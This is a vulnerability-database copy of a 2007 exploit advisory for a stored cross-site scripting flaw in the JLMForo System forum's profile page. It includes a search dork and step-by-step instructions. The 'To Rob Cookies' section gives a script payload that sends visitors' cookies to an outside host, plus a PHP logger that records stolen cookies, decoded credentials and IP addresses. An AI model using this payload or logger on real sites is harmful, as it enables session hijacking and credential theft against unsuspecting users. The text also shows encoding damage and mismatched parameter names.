Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18515
HistoryNov 27, 2007 - 12:00 a.m.

JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

2007-11-2700:00:00
vulners.com
23
JSON

JLMForo System (modificarPerfil.php) Cross-Site Scripting Vulnerability

Download:

http://www.miscodigos.com/aplicaciones/JLMForo%20System/

Bug found by Jose Luis Gуngora Fernбndez / JosS

Contact: sys-project[at]hotmail.com

Spanish Hackers Team

www.spanish-hackers.com

/server irc.freenode.net /join #fullsecure

d0rk: "Powered By JLMForo System"

Stop lammer

Explanation Basic :

1.- Register in the forum (registro.php)
2.- Put in your signature the XSS (modificarPerfil.php)
3.- Create a subject
4.- Wait to an answer to visualize the XSS

To Rob Cookies:

1є- Register in the forum (registro.php)

2є- Put in your signature the XSS (modificarPerfil.php):

<script>window.location=’http://yousite.com/xss.php?cookie=’+document.cookie&lt;/script&gt;

3є- Upload in your Site:

<?php
$archivo = fopen('log2.htm','a');//Aquн podemos cambiar el nombre del archivo a crear
$cookie = $_GET['c'];
$usuario = $_GET['id'];
$ip = getenv ('REMOTE_ADDR');
$re = $HTTPREFERRER;

$fecha=date("j F, Y, g:i a");
fwrite($archivo, '<hr>USUARIO Y PASSWORD: '.base64_decode($usuario).'<br>Cookie: '.$cookie.'<br>Pagina: '.$re.'<br>

IP: ' .$ip. '<br> Fecha y Hora: ' .$fecha. '</hr>');
fclose($archivo);
?>

4є- Chmod 777 archive

5є- Create a subject

6є- Wait to an answer to run the XSS

//---------------------------------------\\

Greetz To: All Hackers
Jose Luis Gуngora Fernбndez / JosS!

JSON